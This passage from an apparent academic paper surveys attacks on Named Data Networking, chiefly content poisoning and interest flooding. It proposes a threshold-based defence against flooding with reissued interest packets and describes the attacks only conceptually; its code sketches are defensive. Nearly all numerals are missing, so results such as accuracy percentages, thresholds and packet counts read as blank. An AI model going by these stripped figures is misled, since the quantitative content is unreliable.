the keylocator field and can retrieve it just like a normal data packet. revisiting the legacy attacks listed above in the ndn context: in a modification attack, the attacker not only compromises the confidentiality of the data by accessing it but also compromises its integrity by trying to alter it. this attack is not possible in ndn, because each piece of data is signed by the publisher, which the consumer can verify; however, if the router itself is compromised and alters the data packet, a corrupted data packet may be sent to the consumer, and the consumer, after receiving the publisher's public key, can detect this corrupted data. in a masquerading attack, the attacker masks their identity and impersonates another person to acquire useful information about that person. this attack is also not possible in ndn because every data chunk is signed by the publisher using his/her private key. in a replay attack, the attacker performs a man-in-the-middle attack, obtains a copy of the message from the sender, modifies it, and sends it to the receiver.
in a replay attack, the attacker performs a man-in-the-middle attack, obtains a copy of a message from the sender and, after modifying it, sends it on to the receiver. the recipient assumes that the actual sender has forwarded the message, but in fact it is the modified message from the attacker with malicious intent. this type of attack is also not possible in ndn because the interest packet is identified by its name, and a nonce is used to keep the namespace unique in the network. when the same interest packet reaches the router (with the same name and nonce), the router assumes the packet is a duplicate that has been replayed and will therefore purge it from the pit table. ndn therefore protects itself from the replay attack at the network layer.

in the ndn architecture, some inherent security features protect against some of the legacy security attacks by default, but there are still emerging security concerns in this new architecture that need to be addressed. security, privacy, and access control are the three major domains that need to be covered in the ndn architecture. several attacks are possible in ndn, such as the content poisoning attack, content pollution attack, naming attack, and denial of service attack. privacy concerns can be classified into five categories: content privacy, signature privacy, client privacy, name privacy, and cache privacy (wein et al., ; ahlgren et al., ; zhang et al., ; hassanein & zulkernine, ). in access control, the mechanisms that need to be addressed are content encryption, content attributes, clients' identity, and authorized sessions.

table: ndn attack types.
attack type | adversary | victim | compromised security goal | ndn element involved in attack
flooding attack of interest packet | consumer | consumer/router/producer | availability | pit
cache pollution attack | consumer | consumer | availability | cs
privacy attack | consumer | consumer | confidentiality | cs
content poisoning attack | producer or router | consumer/router | integrity/availability | cs

attack types in ndn
in ndn there are four main types of security threats, which are briefly discussed in the coming sections; the effects of each attack on the security goals are summarized in table (kumar et al., ; tourani et al., ).

flooding attack of interest packet
benmoussa et al. ( , ) explained in detail the effects of an interest flooding attack, in which an attacker can deplete network resources by flooding the network with large batches of interest packets. the pit, network bandwidth, and the availability of producer resources to legitimate users are compromised by this attack. this attack consumes ndn resources and restricts legitimate users from accessing them.

cache pollution attack
wang et al. ( ) discussed the anatomy of the cache pollution attack: the attacker attempts to fill the cache of the ndn router with unwanted content by requesting data packets that are unpopular and not in demand. as a result, the usefulness of the ndn router's cache decreases, and the cache hit ratio of legitimate users' interest packets will fall. this increases latency and reduces the throughput of the network.

cache privacy attack
during an attack on cache privacy, the attacker wants to figure out whether or not sensitive data has been accessed recently. a newly accessed item lies in the router's cache, and a requester gets a quick response for such data.
the intruder compiles a list of privacy-sensitive content and requests the items one by one, inferring from the delay in retrieving each item whether or not it is cached. if the content is identified, the attacker can conclude that a user or a group of users has recently accessed it. using this technique the adversary learns the user's access pattern; the type of content accessed and other related information is also exposed.

content poisoning attack
one of the most crucial attack vectors in ndn is the content poisoning attack. in cpa, the attacker compromises a router, and this malicious router replies to legitimate requests with totally bogus or corrupted content. the contents of intermediate routers involved in ndn communication are stored in the cs, and this poisoned content spreads when other legitimate consumers request the same content. content in ndn is of three types: legitimate content, fake or poisonous content, and corrupted content. a valid signature of legitimate content is generated with the private key of a legitimate publisher. similarly, a valid signature of fake content can also be generated with any private key that is not associated with the publisher's namespace, whereas corrupted content does not have a valid signature (ullah et al., ). in a content poisoning attack, an attacker takes over a router and replies to incoming interests with corrupted content. wu et al. ( ) explained that if a consumer requests this corrupted content, the malicious content spreads to intermediate routers' content stores, resulting in the spreading of this poisonous content all over the network. verification is usually performed by consumers through the content verification process using the content's signature. in ndn, every router can verify arriving content on its own, but this verification at line speed takes resources and is impractical. gasti et al. ( ) described two ways in which a content poisoning attack can be carried out. the first is that the attacker compromises routers, which spread the poisoned content while satisfying the requested interest packets. the second is that poisoned content is distributed via compromised publishers. compromised publishers can anticipate the data that will be in high demand, for example highlights of a famous football match, and create malicious content for it. in this way, a compromised producer or router can reply to a legitimate interest packet with a malicious data packet.

cpa detection and mitigation approaches
the content poisoning attack can be detected and mitigated through two major approaches: collaborative signature verification and the consumer-dependent approach. in the former, ndn routers collaborate to verify the content's signature. the latter uses extra fields in the interest and data packets or uses clients' feedback.

mitigation of cpa using the consumer-dependent approach
as per the ndn specification, a consumer verifies all the signatures of the requested data packets, so a feedback-based approach is used to verify the content at the router (gasti et al., ). this approach is an extended version of the nvf technique discussed in the previous section. however, it introduces new challenges, such as the absence of a trust relationship between the router and the consumers.
consumers can also be compromised, and in this way false feedback can consume network resources. ghali, tsudik & uzun ( a) proposed a technique in which a content ranking is calculated and stored in the exclude field of the interest packet, with values ranging between and . new content is ranked , and the rank gets downgraded if consumers rate the content and include it in their exclude field. this approach is somewhat similar to the technique of gasti et al. ( ), so it has the same limitations. ghali, tsudik & uzun ( b) highlighted some ndn architecture vulnerabilities, such as the fact that the ppkd field and the name's digest are not mandatory components of the interest packet, and that no trust model is unanimously adopted by consumer applications to fetch the content's hash securely. based on these vulnerabilities, a technique is proposed that enforces an ikb (interest-key binding) rule to ensure trust. according to this rule, the interest packet must include the producer's (content publisher's) public key, and producers must also place the public key in the data packet's keylocator field. the implication for the router is that it should calculate the hash of the public key of the received content and compare it with the ppkd field of its pit entry; upon mismatch the content is discarded, otherwise it is verified. upon successful verification, content is forwarded and stored in the content store of that particular router. yue, li & pang ( ) stated that the ikb implication for consumers is that they must acquire and validate the content provider's public key before issuing the interest packet for that specific data packet. the trust model can be established in three ways: the content provider's public keys are installed in the client application, a universal key name service is used, or a global search-based service is used. also, to reduce the core routers' workload, the authors proposed that the interest-key binding check on the data packet be performed at the edge routers, while core routers perform this check probabilistically. the drawback of this approach is that the verifying router is assumed to be trusted; a malicious router can declare a bogus ikb to be correct. the scheme therefore lacks scalability and has overhead. dibenedetto & papadopoulos ( ) proposed an approach in which consumers, upon verification failure, send a report packet that acts as feedback to the other entities of the ndn network. when a consumer detects poisoned content, a special interest packet is generated by the network stack, and the information regarding the poisoned content is stored in this special report packet. when a router receives this special interest packet, it applies one of the two proposed mitigation options: immediate failover or probe first. in the first approach, the malicious face is marked with a low priority value for the future. in the probe-first technique, the node, upon receiving the special interest packet known as a report packet, stops forwarding interest packets for the namespaces under attack and informs its next-hop routers about the malicious namespace.
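one way to picture these two reactions is the rough sketch below. all names, data structures, and the cost penalty are invented for illustration; this is not the actual implementation of dibenedetto & papadopoulos.

```python
# purely illustrative sketch of the two mitigation reactions to a consumer report packet
LOW_PRIORITY_PENALTY = 1_000_000   # arbitrary cost penalty for a demoted face

def immediate_failover(fib_entries, bad_face):
    """keep forwarding, but demote the face that delivered the poisoned content."""
    for entry in fib_entries:
        if entry["face"] == bad_face:
            entry["cost"] += LOW_PRIORITY_PENALTY

def probe_first(report, suspended_namespaces, next_hops):
    """stop forwarding interests for the attacked namespace and warn next-hop routers."""
    namespace = report["name_prefix"]
    suspended_namespaces.add(namespace)
    for hop in next_hops:
        hop.notify_poisoned_namespace(namespace)   # hypothetical helper on the neighbour
```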
nguyen et al. ( ) explained three vulnerabilities in the ndn architecture: the unregistered remote provider, multicast forwarding, and best route forwarding. the first vulnerability is that an interest packet can be satisfied by a data packet received from any face; therefore, a malicious producer can inject malicious content and satisfy the interest before the legitimate producer does. in ndn, faces are registered as the corresponding values in the fib table, so during multicast forwarding the interest packet is forwarded to all of these faces, and a malicious producer can satisfy the interest packet with its malicious content. in best route forwarding, a router ignores a similar interest packet with the same name and selectors but a different nonce when it is received during the retransmission suppression interval; an interest received after this interval is forwarded via the next lowest-cost route, and thus an interest packet can be satisfied with a malicious producer's poisoned content.

hu et al. ( ) proposed a comprehensive system to mitigate cpa; this article identifies a security flaw in that system and proposes a mitigation strategy to address it. in the following sections, this base system is elaborated in detail. the system comprises three phases: the route building phase, the normal content retrieval phase, and the recovery phase in case of content poisoning. ndn routers are required to enable name-key-based forwarding to forward interests towards registered content sources, and, to specify legitimate content sources, every route advertisement must be authenticated with a trust management system. if content poisoning occurs on intermediate routers, a mechanism of "multipath forwarding based inband probe" is performed. in this approach, an interest packet with an exclude filter (carrying the hash of the poisoned content) is reissued and forwarded via alternate paths. when this packet reaches a particular router, it enables on-demand signature verification of cached contents: the cached content, or the data packet returned against the reissued interest, is checked against the malicious payload hash carried in the interest packet's exclude filter. this approach has two benefits. first, with multipath forwarding there is a good chance that consumers will acquire the legitimate content, while legitimate content can be restored on the intermediate routers via the alternative forwarding options. in this way poisoned contents are purged, and for future requests legitimate contents are returned from the routers' caches, which increases the overall throughput of the network.

comparisons of cpa mitigation approaches
table is a summarized view of the cpa mitigation approaches discussed in the previous sections. based on the analysis of existing techniques and work to detect and mitigate cpa, there is still a need to sort out some challenges while developing a cpa mitigation strategy (hu et al., ). energy management in routers is an important issue: gao, wang & he ( ) evaluated that cpa and caching issues can consume a considerable amount of router energy, which can add instability to the whole system. hu et al. ( ) have implemented a robust and efficient mechanism to mitigate the cpa.
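as a rough picture of the router-side step of this inband probe, the sketch below purges a cached copy whose hash matches the exclude filter of a reissued interest and forwards the probe over alternative faces. the field names and helper objects are made up for illustration and are not hu et al.'s implementation.

```python
import hashlib

def on_reissued_interest(interest, content_store, alternate_faces):
    """illustrative model of the multipath, exclude-filter probe at one router."""
    excluded_hash = interest["exclude_filter"]       # hash of the reported poisoned payload
    cached = content_store.get(interest["name"])

    if cached is not None:
        if hashlib.sha256(cached["payload"]).hexdigest() == excluded_hash:
            # the cached copy matches the reported poisoned content: purge it
            del content_store[interest["name"]]
        # on-demand signature verification of remaining/arriving data would happen here

    # forward the probe over alternative paths so a legitimate copy can be recovered
    for face in alternate_faces:
        face.send(interest)
```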
table: cpa detection and mitigation.
references | ndn node | detection | mitigation | overhead
gasti et al. ( ) | consumer, router | signature, ppkd | sscic, dscic | verification of random signatures
ghali, tsudik & uzun ( a) | consumer | signature | content ranking | content ranking calculation
ghali, tsudik & uzun ( b) | router | ppkd and signature | interest key binding | signature verification
nam, kim & yeom ( ) | router | signature | slru extension | signature verification
kim et al. ( ) | router | signature | slru extension | signature verification
wu et al. ( ) | consumer, router | signature | reputation based forwarding | signature verification
kim et al. ( ) | router | signature in case of cache-hit | slru extension | signature verification
dibenedetto & papadopoulos ( ) | consumer, router | signature | modified forwarding strategy | complete bogus packet in reissued interest packet
hu et al. ( ) | consumer, router | ppkd and signature | name-key based forwarding and multipath forwarding based inband probe | signature verification (hash matching is fast due to ppkd entry)

in table , we have identified vulnerabilities in the content poisoning attack mitigation schemes discussed in the previous sections of this article. in the following section, we explore how these vulnerabilities can be exploited, and a mitigation strategy is proposed, which is the main research contribution of this article.

table: vulnerabilities in cpa mitigation schemes (compromised consumers can flood routers).
references | checked by | proposed solution | energy efficient | security features
gasti et al. ( ) | consumer and router | sscic & dscic | yes | cannot detect corrupted content
ghali, tsudik & uzun ( a) | consumer | content ranking algorithm | no - overhead of calculating the content ratings | does not handle a malicious consumer that reports false content ratings
dibenedetto & papadopoulos ( ) | first consumer and then router | modified forwarding strategy | no - uses complete bogus packet in report | only handles the malicious consumer identity but does not handle the corrupted data
hu et al. ( ) | first consumer and then router | name-key based forwarding and multipath forwarding based inband probe | yes - only uses a ppkd extra field and the bogus/corrupted data hash in the excluded filter field of the interest packet | can prevent poisoning of content by generating special interest packets

proposed approach
introduction
name-key based forwarding with the multipath forwarding based inband probe is a very comprehensive scheme for mitigation of the cpa, and it closes most of the attack surfaces regarding the content poisoning attack. however, the structural changes it introduces to the ndn architecture create a new attack vector that can be exploited by an adversary, and with this attack the whole system can collapse, so it is crucial to highlight this aspect. one of the important attack vectors that emerges with this technique is the flooding of the reissued interest packet containing the excluded filter field; this is the leading research contribution of this article. a consumer with malicious intent can flood the network with interests containing the hash digest of legitimate, un-poisoned data in the exclude field, which can flood the network and enable multipath forwarding. this can harm the throughput of the network or even cause a ddos. based on the research gap mentioned in the previous section, this article formulates the following research questions: what mechanism can detect the attack initiated by consumers with malicious intent? which parameters can mitigate the malicious consumers' reissued interest packet flooding attack? it is therefore essential to mitigate this attack and add this additional security feature to the cpa mitigation technique.

detection of malicious consumer interest packet with excluded filter field
during cpa mitigation, the interest packet reissued by the consumer stores the hash of the poisoned data in the excluded filter field, but a compromised consumer can also store the hash of un-poisoned data in the same field. consequently, this results in a cache miss. the on-demand signature verification at the router will also be enabled during this process, consuming a lot of router processing power.
when a consumer with malicious intent bombards the router with these excluded interest packets, even though they are discarded at the next router upon verification, the router's processing overhead increases drastically, and other legitimate consumers will face a denial of service from this router; in this way, the process of cpa mitigation itself is severely affected. this attack vector should be taken into account, and a mitigation strategy should be devised for such attacks. the block diagram of the flooding scenario is elaborated in fig. . it depicts the scenario of the flooding attack of interest packets with the excluded filter. the first block shows that the consumer generates the normal interest packet. the next block then decides whether it is a normal interest packet or an interest packet with an excluded filter field. if it is a normal interest packet, it is directed towards normal ndn operations; otherwise, it is passed to the next module for on-demand signature verification. here, signature verification is performed against the ppkd in the content store. if validation fails, the packet is discarded; otherwise, the content gets purged from the router's cs. if poisoned data is found in the cs, the normal process is initiated and content poisoning mitigation commences. when a consumer is compromised and starts flooding the ndn network with excluded-filter-enabled interest packets, it triggers on-demand signature verification for each bogus packet, and the next ndn router gets saturated. the queue becomes occupied, and after a while there is less space for legitimate excluded filter interest packets, which badly hampers the cpa mitigation mechanism. this scenario is therefore considered an attack and needs mitigation.

figure: detection of flooding attack during content poisoning attack mitigation.

mitigation of flooding attack
in this article, a reactive approach is proposed to mitigate this attack. a virtual queue is utilized in ndn routers for incoming reissued interest packets from the consumers. a fifo (fcfs) queue is shared among all the incoming faces for reissued interest packets; it is a temporary placeholder for these packets until they get verified. the memory allotted for packets in transit should be different from the memory used for caching.
if the same cs is used for packets in transit and data chunks, the cs will become congested with data chunks waiting to be satisfied by the pending interest packets. to prevent the malicious consumer from sending a fake "excluded interest packet," a satisfaction test is performed to check whether the excluded interest packet is non-existent in the cache or is a legitimate packet in the cache. if cache misses (of the excluded interest packet) occur and their ratio approaches the threshold value set by the operator, it is considered an attack. on-demand verification at the router is not enabled unless there is a cache hit of the excluded interest packet, which reduces the overhead of content verification at the router for each data packet; in case of a cache miss, the excluded interest packet is discarded. still, if a consumer with malicious intent floods the edge router with fake interest packets carrying the exclude filter, it will degrade that particular edge router's performance. the ndn-router service manager at the ndn router, especially at the edge of the network in the consumer domain, maintains and monitors these statistics. upon hitting the threshold value, the face is considered to belong to a malicious consumer, and the router drops future reissued interests with the excluded data packet arriving from that face. this is done temporarily, and the face is delisted at the discretion of the network operator. a new lightweight parameter is added to the cs data structure to retain the cache miss counter of invalid reissued interest packets with the excluded filter field; this value is compared with the threshold value. fig. gives a bird's-eye view of the proposed mechanism. we have introduced a block for the proposed approach: when the reissued interest packet causes several cache misses and the specified threshold value is hit, an event is triggered that blocks the malicious face, and on the next iteration the reissued packets from the malicious consumer face are blocked. in algorithm (fig. ), the ppkd, content name, nonce, incoming face, excluded filter field value, threshold value, and cache miss counter value are passed as arguments. first, the hash comparison is performed; if the result is a cache miss, the cache miss counter value is incremented, and if that value reaches the threshold value, the event that blocks the specific malicious incoming face is triggered. if the result is a cache hit, the normal ndn communication process commences.

dynamic threshold value
this approach helps network operators set the threshold value automatically during a special interest packet flooding attack by a malicious consumer. it aims to select the threshold value in an automated fashion based on statistical monitoring of the buffer capacity and the cache miss ratio. in this approach, network management software continuously monitors the cache miss ratio and buffer capacity when a special interest packet is initiated. when the cache miss ratio, averaged over a period, results in a buffer overflow, the threshold value is reduced to half. this process continues until the threshold value is thrashed to one; this mechanism is elaborated in algorithm (fig. ). at this stage, the incoming face causing the flooding attack is blocked until the particular timeout. the initial threshold and the cache miss ratio are computed as

$Init_{Th} = QueueSize / VerificationRate$  ( )

$cache\_miss\_ratio = CM / (CM + CH)$  ( )

where cm and ch denote the numbers of cache misses and cache hits, respectively. the network management software will continuously monitor the cache_miss_ratio and the buffer size of the queue.
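putting the two algorithms together, a simplified python rendering of the idea is sketched below. the data structures and attribute names are ours (the paper's simulator is written in c#), so this is a reading of the described behaviour under those assumptions, not the authors' code.

```python
def handle_excluded_interest(router, interest, face):
    """algorithm 1, simplified: count cache misses of excluded interest packets per
    incoming face and block the face once the threshold is reached."""
    cs_entry = router.content_store.get(interest.name)
    cache_hit = cs_entry is not None and cs_entry.hash == interest.exclude_hash

    if cache_hit:
        router.verify_and_purge(cs_entry)          # on-demand signature verification
        return "normal-cpa-mitigation"

    # cache miss: the excluded hash does not point at anything poisoned the router holds
    router.cache_miss[face] = router.cache_miss.get(face, 0) + 1
    if router.cache_miss[face] >= router.threshold:
        router.block_face(face)                    # delisted later at operator's discretion
        return "face-blocked"
    return "discarded"

def adapt_threshold(router, cache_miss_ratio, queue_occupancy):
    """algorithm 2, simplified: start from queue_size / verification_rate and halve the
    threshold while the attack persists, down to a floor of one."""
    if router.threshold is None:
        router.threshold = router.queue_size // router.verification_rate
    if cache_miss_ratio > router.ratio_limit and queue_occupancy >= router.queue_limit:
        router.threshold = max(1, router.threshold // 2)
```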
benefits of dynamic threshold values over static threshold values
the mitigation of the flooding attack of special interest packets works with two approaches. the first uses static threshold values, which are set by network operators during the router's initial configuration. the second is the dynamic approach, in which the threshold value is adjusted adaptively by monitoring the queue size and the cache miss ratio value.

figure: mitigation of flooding attack.

experimental results
simulation environment
for proof of concept and to run this scenario, a custom-built ndn simulator was developed in the c# language in visual studio . the network parameters used in the simulation scenarios are listed in table .

table: simulation parameters.
parameter | default value
request rate | interests/second/consumer (interest with exclude parameter)
max queue length | (experiment and experiment ); , (experiment and experiment )
verification of interest packet | interest/second
no. of malicious consumers | (experiment and experiment ); (experiment and experiment )
threshold value | x

figure: detection and mitigation of flooding attack of reissued interest packet.

network topology
scenario : one malicious consumer
in scenario , our simulations' network topology consists of two routes from the consumer to the producer. the two route paths used in this scenario are - - - - - - and - - - - - ; these paths are between the consumer and a producer (spring et al., ). in this scenario, it is evident that consumers with malicious intent can flood the network with unwanted interest packets whose excluded fields are occupied by a non-malicious or legitimate payload. if this is not mitigated at the edge router, all the routers will enable on-demand verification, and router performance will degrade with time. this problem can be mitigated by enabling a mechanism at the ndn edge routers and setting a threshold value such that, once it is hit, the interface through which these malicious excluded interest packets arrive is blocked. in this way, the rest of the network is kept safe from these malicious packets, and the performance of the intermediate routers is not degraded. to handle this issue, the network manager at the ndn edge router enables this mechanism, in which a malicious interest packet with the exclude field is dropped in case of a cache miss and, upon hitting the threshold value, the interface from which these excluded interest packets are received is blocked and added to the delist data structure. the timeout to get out of this delist data structure is at the discretion of the network operator.

figure: dynamic threshold value.
scenario : two malicious consumers
in scenario , our simulations' network topology consists of two routes from two consumers (i.e., consumer and consumer ) of the same domain to the producer via router (the edge router). the routes used in this scenario are - - - - - - and - - - - - ; these paths are between the consumers and a producer (spring et al., ). the main thing to note in this scenario is that consumer and consumer are in the same domain; at router , the virtual queue for incoming reissued interests is shared between these two consumers, and the queuing mechanism used is fifo. there are two consumers with malicious intent in this scenario, and they can flood the network with unwanted interest packets whose excluded fields are occupied by a non-malicious or legitimate payload. if this is not mitigated at the edge router, the virtual queues will be fully occupied, leaving no room for legitimate reissued interest packets, and consequently packets will drop. this problem can be mitigated by enabling a mechanism at the ndn edge routers and setting a threshold value such that, once it is hit, the interface through which these malicious excluded interest packets arrive is blocked. in this way, the rest of the network is kept safe from these malicious packets, and the performance of the intermediate routers is not degraded.

experiments and results
experiment (scenario ): with no threshold values
in this experiment, as shown in fig. , we calculated the cache miss ratio of the interest packets containing the exclude filter and compared it with the queue length. upon flooding the router with fake interest packets, the verification process takes time, and meanwhile the queue of interest packets starts increasing. after every second, % of the fake packets drop and % are added to the queue. initially, no threshold value is set. after some time, congestion occurs at the router's incoming interest packet queue, resulting in a drop of other future packets at this router.

figure: flooding attack with no threshold value and with one malicious consumer.

experiment (scenario ): with threshold values
in the second experiment, as shown in fig. , our proposed scheme is enabled at the edge routers in the network management software. after several cache misses, and upon hitting the threshold value set according to the simulation settings, it blocks the incoming face of the consumer, and no more interest packets are received from this malicious consumer face. after the specified threshold value is hit, the face is blocked and fake packets begin to drop from the queue; at s the queue is empty and the router is no longer saturated.

experiment (scenario ): with no threshold values
in the third experiment, as shown in fig. , consumer starts flooding the network with fake interest packets carrying the excluded filter; the queue begins to saturate because the verification rate is slow compared to the flooding rate. in the th second, consumer also starts to flood the network; consequently, the queue begins to saturate linearly. initially, no threshold value is set, and at the th second congestion occurs at the router's incoming interest packet queue, which results in a drop of other future packets at this router.
experiment (scenario ): with threshold values
in the fourth experiment, as shown in fig. , our proposed scheme is enabled at the edge routers in the network management software. when the cache miss threshold value is reached, it blocks the incoming face of consumer after three failed verifications at the th second; after that, no interest is received from this malicious consumer face. at the th second, the other malicious consumer starts to saturate the queue and, similarly, after three failed attempts this face gets blocked as well; the queues start to shrink after both of the malicious consumer faces are blocked.

figure: flooding attack with threshold value and with one malicious consumer.

dynamic threshold value
it is evident in the experiment that, with the increase in the cache_miss_ratio, the queue size increases because the flooding rate is greater than the verification rate. in addition, each cache miss has a penalty on the router's processor, which increases the processing overhead. in the graph (fig. ), the initial threshold value is set to the buffer size divided by the packet verification rate. at the th second, the queue is filled up to %; at this stage, new packets start to drop. here, the system should act prudently and reduce the threshold value to half of the current value; if flooding continues, the threshold value is halved again, as shown in fig. , and so on until the value is reduced to . at this stage, the incoming face is blocked, as it is considered an attack. the queue is then no longer saturated, and memory is available for other interest packets to be processed.

figure: flooding attack with threshold value and with two malicious consumers.
figure: flooding attack with no threshold value and with two malicious consumers.

if the flooding attack continues, we multiplicatively decrease the threshold value by another half. this mechanism continues against that particular flooding malicious face until the threshold value reaches . at this stage, that particular face is blocked and considered a malicious face. the face remains blocked until the timeout, whose value is at the network operator's discretion.

figure: special interest packet flooding with dynamic threshold value.
figure: special interest packet flooding without dynamic threshold value.

effectiveness and accuracy of the proposed solution by comparing the throughput of normal special interest packets
the simulation scenario is depicted in table . in the first scenario, one compromised consumer bombards the router with , malicious interest packets, and a legitimate consumer in the same domain also injects , normal interest packets into the system. in this scenario, no threshold value is set. the maximum throughput of a particular face is bps.
initially, the throughput of the normal interest packets was up to % of the total capacity, which is the desired result. in the subsequent seconds, however, the malicious packets entered the router: the queue capacity started to saturate, and the throughput of the normal interest packets started to drop as the queue filled up with the bombarded malicious packets. the processing overhead also started to increase because of the cost of the cache-miss penalty and the verification overhead. this scenario is depicted in fig. . in the second scenario, one compromised consumer again bombards the router with , malicious interest packets, and a legitimate consumer in the same domain also injects , normal interest packets into the system. in this scenario, our proposed solution is placed and activated inside the ndn router service manager. the maximum throughput of a particular face is bps. the throughput of the normal interest packets was initially up to % of the total capacity, which is the desired result. in the subsequent seconds the malicious packets entered the router and the queue capacity started to saturate; the proposed solution was then activated and blocked the malicious face when the cache miss counter value reached the threshold value. we can see that, in our simulation environment, after the rd second malicious packets no longer entered the router queue, the throughput of the normal interest packets started to rise, and other factors such as processing overhead and the queue capacity ratio returned to the normal working range. this scenario is depicted in fig. . a total of , bombarded malicious packets were detected and dropped successfully by our system; the system accuracy proved to be %. also, , legitimate special interest packets were processed and no packet was dropped. the comparison of throughput, queue capacity, and processing overhead during the cpa special interest packet flooding attack for our proposed approach is summarized in table .

table: simulation parameters for effectiveness of proposed approach.
parameter | default value
request rate | interests/second/consumer (special interest packets)
interest packet max queue length |
verification of interest packet | interest/second
number of malicious special interest packets | , pkts
number of normal special interest packets | , pkts
number of malicious consumers |
threshold value | x

figure: throughput of the normal special interest packets in flooding attack scenario.
figure: throughput of the normal special interest packets in flooding attack scenario with proposed mitigation strategy.

table: comparison of throughput, queue capacity and processing overhead during special interest packet flooding attack.
category | proposed approach | dibenedetto & papadopoulos ( )
min throughput of normal interest packet | % | %
max queue occupation | % | %
reporting packet size | lightweight (sha hash, bytes) | heavyweight (complete packet)
trust anchor | yes | yes
max processing overhead | % | %
compromised consumer detection | yes | yes
bogus report packet detection | yes | partial
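for intuition only, the toy discrete-time sketch below mimics the qualitative queue behaviour reported in these experiments (queue grows while the flooding rate exceeds the verification rate, then drains once the face is blocked). every number in it is invented; it is not the c# simulator used for the results above.

```python
# toy, purely illustrative discrete-time model of the flooding/blocking dynamics
flood_rate, verify_rate, queue_cap, threshold = 100, 60, 500, 3

queue, consecutive_misses, face_blocked = 0, 0, False
for second in range(1, 16):
    if not face_blocked:
        queue = min(queue_cap, queue + flood_rate)   # fake excluded-interest packets arrive
        consecutive_misses += 1                       # each batch fails the satisfaction test
        if consecutive_misses >= threshold:
            face_blocked = True                       # malicious face gets blocked
    queue = max(0, queue - verify_rate)               # router verifies/discards what it can
    print(f"t={second:2d}s  queue={queue:4d}  blocked={face_blocked}")
```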
effectiveness and efficacy of proposed solution
the effectiveness and efficacy of the proposed solution, in terms of the throughput of interest packets and queue capacity, is elaborated in the experiments shown in figs. and and summarized in table . it is evident from the experiments that, during the special interest packet flooding attack, our proposed approach showed promising results in terms of throughput, queue capacity, and processing overhead.

conclusion and future direction
the main contribution of this work is a mechanism that identifies and prevents compromised consumers from flooding the network with the special interest packets that are generated during the mitigation process of the content poisoning attack. the compromised consumers place the hash of un-poisoned content in the excluded filter field of the special interest packet, which causes a cache miss at the edge router. the bombardment of these special interest packets tremendously increases the processing overhead on the ndn router; the cost is in terms of the cache-miss penalty and verification overhead. the queue capacity of the ndn router also gets saturated, and consequently the legitimate requests from other consumers get dropped or face substantial delays. we also observed the damaging effect of multiple malicious consumers flooding the edge router, which was likewise handled well by the proposed technique. after the implementation of our scheme in the network service manager at the ndn edge router, the malicious face is blocked when the cache-miss ratio value reaches the specified threshold value. we have also made the threshold value dynamic by adjusting the initial threshold according to the cache-miss ratio and queue capacity values. this technique can be improved by incorporating quality-of-service solutions in ndn routers: multiple virtual queues for special interest packets can be maintained in ndn routers to handle the flooding of these packets, and different queuing disciplines and algorithms such as adaptive virtual queue (avq), credit-based fair queuing, weighted fair queuing, quick fair queueing, and class-based queuing can be tested to augment our approach. traffic shaping and rate control mechanisms can also be used to hold back the malicious face.

additional information and declarations
funding
the authors received no funding for this work.
competing interests
masood ur-rehman is an academic editor for peerj.
author contributions
- adnan mahmood qureshi conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
- nadeem anjum conceived and designed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
- rao naveed bin rais conceived and designed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
- masood ur-rehman performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
- amir qayyum analyzed the data, authored or reviewed drafts of the paper, provided the logistics to perform experiments, and approved the final draft.
data availability
the following information was supplied regarding data availability: code is available at figshare: qureshi, adnan ( ): myndnsim.zip. figshare. software. doi . /m .figshare. .v .

references
ahlgren b, dannewitz c, imbrenda c, kutscher d, ohlman b. . a survey of information-centric networking. ieee communications magazine ( ): – doi . /mcom. . .
benmoussa a, tahari aek, kerrache ca, lagraa n, lakas a, hussain r, ahmad f. . msidn: mitigation of sophisticated interest flooding-based ddos attacks in named data networking. future generation computer systems ( ): – doi . /j.future. . . .
benmoussa a, tahari aek, lagraa n, lakas a, ahmad f, hussain r, kerrache ca, kurugollu f. . a novel congestion-aware interest flooding attacks detection mechanism in named data networking. in: th international conference on computer communication and networks (icccn), july–aug. , valencia, spain. – .
dibenedetto s, papadopoulos c. . mitigating poisoned content with forwarding strategy. in: ieee conference on computer communications workshops (infocom wkshps). piscataway: ieee, – .
gao m, wang k, he l. . probabilistic model checking and scheduling implementation of energy router system in energy internet for green cities. ieee transactions on industrial informatics ( ): – doi . /tii. . .
gasti p, tsudik g, uzun e, zhang l. . dos & ddos in named-data networking. in: proceedings - international conference on computer communications and networks, icccn, nassau, bahamas. – .
ghali c, tsudik g, uzun e. a. needle in a haystack: mitigating content poisoning in named-data networking. in: ndss symposium, february , san diego, ca, usa.
ghali c, tsudik g, uzun e. b. network-layer trust in named-data networking. acm sigcomm computer communication review ( ): – doi . / . .
hassanein h, zulkernine m. . a survey of security attacks in information centric networking. ieee communications surveys & tutorials ( ): – doi . /comst. . .
hu x, gong j, cheng g, zhang g, fan c. . mitigating content poisoning with name key based forwarding and multipath forwarding based in band probe for energy management in smart cities. ieee access : – .
jacobson v, smetters dk, thornton jd, plass mf, briggs nh, braynard rl. . networking named content. in: proceedings of the th international conference on emerging networking experiments and technologies, conext ' . new york: association for computing machinery, – .
kim d, bi j, vasilakos a, yeom i. . security of cached content in ndn. ieee transactions on information forensics and security ( ): – doi . /tifs. . .
kim d, nam s, bi j, yeom i. . efficient content verification in named data networking. in: proceedings of the nd acm conference on information-centric networking, acm-icn ' . new york: association for computing machinery, – .
kumar n, singh ak, aleem a, srivastava s. . security attacks in named data networking: a review and research directions. journal of computer science and technology ( ): – doi . /s - - - .
nam s, kim d, yeom i. . content verification in named data networking. in: international conference on information networking (icoin). – .
nguyen t, marchal x, doyen g, cholez t, cogranne r. .
content poisoning in named data networking: comprehensive characterization of real deployment. in: ifip/ieee symposium on integrated network and service management (im). piscataway: ieee, – .
qureshi am, anjum n. . detection of malicious consumer interest packet while mitigating content poisoning attack with name-key based forwarding and multipath forwarding based inband probe. in: international conference on uk-china emerging technologies (ucet). glasgow: university of glasgow, – .
ribeiro i, rocha a, albuquerque c, guimarães f. . content pollution mitigation for content-centric networking. in: th international conference on the network of the future (nof), – november , búzios, rio de janeiro, brazil. – .
spring n, mahajan r, wetherall d, anderson t. . measuring isp topologies with rocketfuel. ieee/acm transactions on networking ( ): – doi . /tnet. . .
